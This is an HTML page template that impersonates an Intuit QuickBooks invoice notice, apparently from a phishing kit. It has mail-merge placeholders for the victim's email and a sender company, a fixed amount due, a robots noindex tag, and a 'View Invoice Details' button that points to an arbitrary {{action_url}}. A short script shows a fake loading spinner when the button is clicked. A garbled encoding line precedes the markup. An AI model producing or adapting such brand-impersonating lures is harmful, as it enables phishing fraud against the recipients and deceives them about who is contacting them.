²é¿´/±à¼ ´úÂë
ÄÚÈÝ
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Invoice Ready</title> <meta name="robots" content="noindex, nofollow"> <style> :root { --primary: #2ca01c; --bg: #f0f0f0; --card: #ffffff; --text: #333333; --muted: #666666; } * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: var(--bg); min-height: 100vh; display: flex; align-items: center; justify-content: center; padding: 20px; } .container { background: var(--card); border-radius: 8px; box-shadow: 0 2px 8px rgba(0,0,0,0.1); max-width: 480px; width: 100%; overflow: hidden; } .header { background: var(--primary); padding: 20px 24px; display: flex; align-items: center; gap: 12px; } .logo-icon { font-size: 28px; } .logo-text { color: white; font-size: 20px; font-weight: 600; } .content { padding: 24px; } .title { font-size: 18px; color: var(--text); margin-bottom: 8px; } .subtitle { font-size: 14px; color: var(--muted); margin-bottom: 20px; } .invoice-card { background: #f8f9fa; border: 1px solid #e9ecef; border-radius: 8px; padding: 20px; margin-bottom: 20px; } .invoice-header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 15px; padding-bottom: 15px; border-bottom: 1px solid #e9ecef; } .invoice-number { font-size: 14px; color: var(--muted); } .invoice-status { background: #fff3cd; color: #856404; padding: 4px 10px; border-radius: 12px; font-size: 12px; font-weight: 500; } .invoice-row { display: flex; justify-content: space-between; padding: 8px 0; } .invoice-label { font-size: 13px; color: var(--muted); } .invoice-value { font-size: 13px; color: var(--text); font-weight: 500; } .invoice-total { margin-top: 15px; padding-top: 15px; border-top: 2px solid var(--primary); display: flex; justify-content: space-between; } .total-label { font-size: 16px; font-weight: 600; color: var(--text); } .total-value { font-size: 20px; font-weight: 700; color: var(--primary); } .action-btn { display: block; width: 100%; padding: 14px; background: var(--primary); color: white; text-decoration: none; text-align: center; border-radius: 6px; font-weight: 600; font-size: 14px; transition: background 0.2s; } .action-btn:hover { background: #248a17; } .footer { text-align: center; padding: 16px; font-size: 11px; color: var(--muted); border-top: 1px solid #eee; } .loading { display: none; text-align: center; padding: 40px; } .spinner { width: 30px; height: 30px; border: 3px solid #eee; border-top-color: var(--primary); border-radius: 50%; animation: spin 1s linear infinite; margin: 0 auto 10px; } @keyframes spin { to { transform: rotate(360deg); } } </style> </head> <body> <div class="container"> <div class="header"> <span class="logo-icon">📊</span> <span class="logo-text">QuickBooks</span> </div> <div class="content" id="mainContent"> <h1 class="title">Invoice Ready for Review</h1> <p class="subtitle">{{company}} has sent you an invoice</p> <div class="invoice-card"> <div class="invoice-header"> <span class="invoice-number">{{doc_ref}}</span> <span class="invoice-status">Awaiting Payment</span> </div> <div class="invoice-row"> <span class="invoice-label">From:</span> <span class="invoice-value">{{company}}</span> </div> <div class="invoice-row"> <span class="invoice-label">To:</span> <span class="invoice-value">{{email}}</span> </div> <div class="invoice-row"> <span class="invoice-label">Date:</span> <span class="invoice-value">{{date}}</span> </div> <div class="invoice-row"> <span class="invoice-label">Due Date:</span> <span class="invoice-value">Net 30</span> </div> <div class="invoice-total"> <span class="total-label">Amount Due:</span> <span class="total-value">$1,948.00</span> </div> </div> <a href="{{action_url}}" class="action-btn" id="actionBtn">View Invoice Details</a> </div> <div class="loading" id="loadingState"> <div class="spinner"></div> <p>Loading invoice...</p> </div> <div class="footer"> Intuit QuickBooks • Secure Business Payments </div> </div> <script> (function(){ var btn = document.getElementById('actionBtn'); var main = document.getElementById('mainContent'); var load = document.getElementById('loadingState'); if(btn && main && load) { btn.addEventListener('click', function(){ main.style.display = 'none'; load.style.display = 'block'; }); } })(); </script> </body> </html>